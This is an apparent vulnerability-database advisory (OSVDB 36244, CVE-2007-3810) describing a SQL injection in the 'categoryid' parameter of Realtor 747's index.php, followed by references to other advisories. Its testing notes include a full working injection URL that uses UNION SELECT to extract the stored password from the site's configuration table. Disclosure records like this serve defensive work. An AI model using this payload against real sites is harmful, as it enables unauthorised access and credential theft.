Realtor 747 index.php categoryid Variable SQL Injection

2007-07-14T00:00:00
ID OSVDB:36244
Type osvdb
Reporter OSVDB
Modified 2007-07-14T00:00:00

Description

Manual Testing Notes

http://[target]/realtor747/index.php?pageid=2&categoryid=-1//UNION//ALL//SELECT//1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21//FROM//AD747_CONFIG%20where/*/config_key=0x70617373776F7264/

References:

Secunia Advisory ID:26068 Other Advisory URL: http://www.milw0rm.com/exploits/4184 ISS X-Force ID: 35420 FrSIRT Advisory: ADV-2007-2541 CVE-2007-3810 Bugtraq ID: 24916